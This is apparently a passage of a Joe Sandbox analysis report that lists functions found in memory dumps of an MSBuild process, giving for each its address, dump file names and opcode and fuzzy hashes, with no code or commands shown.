                                                                                                                                                                                                                                                • Opcode ID: 5e7d47cbd6fdb20d6887e2bea7a1b3362c90e23de2eef3a3d01137df7cee560a
                                                                                                                                                                                                                                                • Instruction ID: 56f42b5cfa0926bd7e55ee84fd32286a68288fdcfe0b9278c9098d6b57777d6c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7d47cbd6fdb20d6887e2bea7a1b3362c90e23de2eef3a3d01137df7cee560a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02318FB07102459FDB29DF28C884AABBBF6EF8A310F154069E901DB3A1E770DC40CB91
                                                                                                                                                                                                                                                Function 07090DD0 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8e1313651eaa342bb4c6f7d344b0b6056397c47147128aa0ba797e47b49fe1a3
                                                                                                                                                                                                                                                • Instruction ID: 1610267ce2c0387819525b9e8541ca88a484a8c21e08460b2b1bd3631d500a88
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e1313651eaa342bb4c6f7d344b0b6056397c47147128aa0ba797e47b49fe1a3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31D578E11218DFCB44DFA8E5559EEBBF2FB89300F10412AEA05A7354DB346D019FA1
                                                                                                                                                                                                                                                Function 072A9D91 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3c5e6cebe12925c834d7ca196c5ecb0c684add6fb1d1ef36a0cd4bf70008d54b
                                                                                                                                                                                                                                                • Instruction ID: 93d56e4b40c72a3a5a12bb49437eb45ca8d6111c01cf537ecfb2e6801828f3f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c5e6cebe12925c834d7ca196c5ecb0c684add6fb1d1ef36a0cd4bf70008d54b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3521A4B9309381AFC3269F35E8948937BB5EF8631471444AEE485CB253C732ED4AC761
                                                                                                                                                                                                                                                Function 07091310 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 968e2ddbaa213c8f67eee06562eb18c6ee9db2866c7407b570e9c42c022c9b0b
                                                                                                                                                                                                                                                • Instruction ID: 0e1084008c0ac490aeec1fcc55168985aade72dbd5cd94d08a882f19b20ebf54
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 968e2ddbaa213c8f67eee06562eb18c6ee9db2866c7407b570e9c42c022c9b0b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8431D678E10219DFCB44EFA9E5949AEBBB2FF89700F204129D605A7354DB306D01DF91
                                                                                                                                                                                                                                                Function 071B1588 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 53c307bc49a8002b4990bca1d8d3d46e4ae279c68627ec90f5fd9a96add0944c
                                                                                                                                                                                                                                                • Instruction ID: 6baf19d712e521aecc56d3218ec1add0630b8a9ea1ffa7d3ef452c88a04e4b2d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53c307bc49a8002b4990bca1d8d3d46e4ae279c68627ec90f5fd9a96add0944c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4219FF4700209AFCB149F64D864ABE7BE6FF8C341F054528E812D7381DBB99D119BA1
                                                                                                                                                                                                                                                Function 07096688 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 25f75b80d47dacbf8921fd0208e6faa957a39d7b192d8f11a7e555b381172819
                                                                                                                                                                                                                                                • Instruction ID: 2c1087002fd476cd1517a9c9013f4a964f153a865f03b46320a218fd819498df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25f75b80d47dacbf8921fd0208e6faa957a39d7b192d8f11a7e555b381172819
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE2130703103056BE758AA329851B7F6397FFC0A71F48892CD5038F284DD72EE4A5B95
                                                                                                                                                                                                                                                Function 07116FF8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f79f872f32b6c9f2b873585da762a4320bdc67ec55b07a1db31d6b96b9e091c
                                                                                                                                                                                                                                                • Instruction ID: 062103857259d59c42a9b26b62b936c2867fe9fdf1f1bf2de51e3dbd75c68373
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f79f872f32b6c9f2b873585da762a4320bdc67ec55b07a1db31d6b96b9e091c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD11E6B23142108FD748DB7DE848969B7EAEFC863171541BAE60ECB3A0DE32DC018B50
                                                                                                                                                                                                                                                Function 07118138 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4b85a5d41b9c1eab5ba7aedf7efa94c02c9a5a460c5466fe01a9d7bf69e03b53
                                                                                                                                                                                                                                                • Instruction ID: 0e5ac2446918244c4523ec4ceb17f3f697329995c424fbfb71c976cfec667464
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b85a5d41b9c1eab5ba7aedf7efa94c02c9a5a460c5466fe01a9d7bf69e03b53
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F214AB1B402109FC715EF78C844A6AB7F2BF89220B1146A9E506DF3A1DB30EC41CB91
                                                                                                                                                                                                                                                Function 071BEDC0 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3501e0eec08e3a117f1414620339d9d46b2e3d6378092850344b6c7e05412b2a
                                                                                                                                                                                                                                                • Instruction ID: d62332fc72e2f236fea3feb432c4751568e91a7d9f231b704bf5a0e9a572d10c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3501e0eec08e3a117f1414620339d9d46b2e3d6378092850344b6c7e05412b2a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6821CCB5B102029FCB18EF65C9959EEBBB2AF88210F114269D40A972A1DB34ED05CB91
                                                                                                                                                                                                                                                Function 07117FB1 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2f8adeafa9494638a8e5d48c3f6c70c88ac72dc69a2636896835a71dad326502
                                                                                                                                                                                                                                                • Instruction ID: 0599dabcccf2b0c9481c84ea11780193b419422cecd073ef6b0c226c5fb7801f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f8adeafa9494638a8e5d48c3f6c70c88ac72dc69a2636896835a71dad326502
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78215AB0A00A1ACFCB16DF58C984A6ABBF5FF49765F15C0B9D9059F2A1C730E841CB61
                                                                                                                                                                                                                                                Function 072AFC1F Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 806914a5195605f8c795080b47305f8bff92b1e4de94f5f3f697690812afbe89
                                                                                                                                                                                                                                                • Instruction ID: 553d3ccfec13d36d72c2bae9dbdc7aad502a549f579541cebbe1efcda781cf55
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 806914a5195605f8c795080b47305f8bff92b1e4de94f5f3f697690812afbe89
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8731917190035A9FDB11EFA5E880AD9B7F5FF41314F208796D4049B119EB70AA85CB81
                                                                                                                                                                                                                                                Function 072AFB40 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 36fc35609f14ef6a28bc937a07d3a6fd7786f0ee60b85dedc84a951f340cdd4a
                                                                                                                                                                                                                                                • Instruction ID: 57af8880f6aec332edb18953fcf52ab8cedb403776d237dfe9d20ce9b4489784
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36fc35609f14ef6a28bc937a07d3a6fd7786f0ee60b85dedc84a951f340cdd4a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F021E071E0035E9FDF10DFA8D880ADDB7B5FF88310F10862AE505AB254EB70A949CB80
                                                                                                                                                                                                                                                Function 072AAA02 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ccd661a6c4b544689b82d486a5ef4535088ce96b4e28cee13781e1ebee21416b
                                                                                                                                                                                                                                                • Instruction ID: 231357bdca5c7324ded9c4206b7f906b15141fc2f688fb0cd858743d25c4555e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccd661a6c4b544689b82d486a5ef4535088ce96b4e28cee13781e1ebee21416b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED21C2B4710301EFD7259B35D540AAAB7F6EF89310F11846AD8099B792DB31DC02CBE2
                                                                                                                                                                                                                                                Function 07117FC0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7dd1d99d3c5e4fbb81778ac9f6d7f1a296a3a8ba995a984f7a9a3783caea3099
                                                                                                                                                                                                                                                • Instruction ID: a2c2cacc892c0980ddb023b46cc32d24d8da4f1cef3b76ed72f95f524cac496b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dd1d99d3c5e4fbb81778ac9f6d7f1a296a3a8ba995a984f7a9a3783caea3099
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57217AB0A0061ACFCB16DF68D984A6ABBF0EF45764F15C0B9D9059F2A1CB30E840CB61
                                                                                                                                                                                                                                                Function 072A9DA0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e0bb39d6539d5b54e5681363f1cb0de35313b112a49d855a61c31cd9d1001fe4
                                                                                                                                                                                                                                                • Instruction ID: ff47862934da153cf699a24408b034f1cf66434418292c59d44020dc359590a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0bb39d6539d5b54e5681363f1cb0de35313b112a49d855a61c31cd9d1001fe4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A711A2B53053419FC3259E35D88485377B6EF8631471044AEE546CB392CB32EC46C760
                                                                                                                                                                                                                                                Function 0711A5F0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9a2a7668129f7b0f8e35a7571d5e0c7fd8b8c4d2ad7c7cebc0aa3cb28caa2d5a
                                                                                                                                                                                                                                                • Instruction ID: d33e63e51f471e93c204d242c9e4eb9317ff29354e9a29667983c6f7448f3e74
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a2a7668129f7b0f8e35a7571d5e0c7fd8b8c4d2ad7c7cebc0aa3cb28caa2d5a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D219071205340AFD315DF20D894E567FF6EF86724B1584AAE546CF2A2CB31EC45CB50
                                                                                                                                                                                                                                                Function 070914C0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 91777f8142a17a3baf39f31d75dfab220f3234a43d27546a06887f260b47bf0d
                                                                                                                                                                                                                                                • Instruction ID: e761635c082c0c7bc9eaee89e75b7b23ed472e8f149e0030636269d083225d6a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91777f8142a17a3baf39f31d75dfab220f3234a43d27546a06887f260b47bf0d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D2126B0E01209DFDB48DFA6D854ADEBBF2AF89300F148129E405B7350DB354842CBA5
                                                                                                                                                                                                                                                Function 07090DE0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f31a01653c2bb3b7e7bc439cab640210ed09733255f03343da1dcbb754148e62
                                                                                                                                                                                                                                                • Instruction ID: 9c22513fbf8b73a260d379bb3961edd62f629ed929e8fbfe04d41c2552dc7dc0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f31a01653c2bb3b7e7bc439cab640210ed09733255f03343da1dcbb754148e62
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7331A378E10219DFCB44DFA9E5849AEBBF2FB89300F10412AEA05A7354DB346D019F91
                                                                                                                                                                                                                                                Function 072A4380 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cd037cb0283abb3926cc58d2a4ced0e4fc5cd1952602f6c840ed7b0304760a29
                                                                                                                                                                                                                                                • Instruction ID: 63e657ebdf8d25c3ce1661dacded75f7a4efb0d9b45c88fcb9bac6b5c7832b4c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd037cb0283abb3926cc58d2a4ced0e4fc5cd1952602f6c840ed7b0304760a29
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58113AB5721253BBCF18AB38D9401FA37F6AFC83507100239D406C7241EBB4E90987D1
                                                                                                                                                                                                                                                Function 072A8977 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e1619e3a1ff4b91030a17927d9fe4b0c4567a5ee821507a080a44daaea13080a
                                                                                                                                                                                                                                                • Instruction ID: 406fd0fc5435506588cc28e632836e9dd1a1b101d855a639f4464c5242176f2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1619e3a1ff4b91030a17927d9fe4b0c4567a5ee821507a080a44daaea13080a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4721962262D3E26FD7039B78A8701E6BFE09E8327471544E3C190CB493D614884ACBAB
                                                                                                                                                                                                                                                Function 072A9CC0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a0acb42c9fdea811c446df83e6777238daae3f3ab310f8459a758c537b954015
                                                                                                                                                                                                                                                • Instruction ID: 5c3275b74a2f7dae321e138d912789ae826b71149feb8a9c3ed6b2271912dd64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0acb42c9fdea811c446df83e6777238daae3f3ab310f8459a758c537b954015
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0511277BB146546FCB12266EB4186A9BB2897C3330F0600B3E5D8DF493C014ADC887A1
                                                                                                                                                                                                                                                Function 072AB710 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e67aa5b9dda7562a328d5a3a04d7021c02bd98285d7cdfc1e13787a54da5dbe4
                                                                                                                                                                                                                                                • Instruction ID: e50671e5ca4cb29b9af37f8af6ee65e895b0618f6b8737306ca7e9f1df66df16
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e67aa5b9dda7562a328d5a3a04d7021c02bd98285d7cdfc1e13787a54da5dbe4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 662197F2610245DFC724DF25CA919AE7BF2FF49250B150669D04ADB2A1DB30ED44CB92
                                                                                                                                                                                                                                                Function 072AAAE2 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e3f37a9334da7b0e271f7ead1d2027eb4c2a5f906c28fc190fd9ae1d6a4b6bae
                                                                                                                                                                                                                                                • Instruction ID: 2497ada3d0275d1c60bedc2b2a01d2943cd41db01c3a8302fb9985e63e9443c3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3f37a9334da7b0e271f7ead1d2027eb4c2a5f906c28fc190fd9ae1d6a4b6bae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0213574614346AFCB14DF74E8808EABBF1FF81320B1484A9D508DB252D730ED44CBA1
                                                                                                                                                                                                                                                Function 0124D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1647786671.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_124d000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f037a4b5f3819fd13948488bf0a3ad3cf49de3053b7f5d9bba026a6890fde56e
                                                                                                                                                                                                                                                • Instruction ID: d60a6114bf0cc08b7e0b8397c9e955251b4d477244a1bf658677f3d9af94b5f0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f037a4b5f3819fd13948488bf0a3ad3cf49de3053b7f5d9bba026a6890fde56e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15213471614308EFDB19DFA4D8C4B26BBA1FB94314F20C5ADE90A0B242C37BD447CA62
                                                                                                                                                                                                                                                Function 0711F688 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d45893d42ba43b3e6a6748025432075fa60f64ad32a837dcc06ce7e37249cc0d
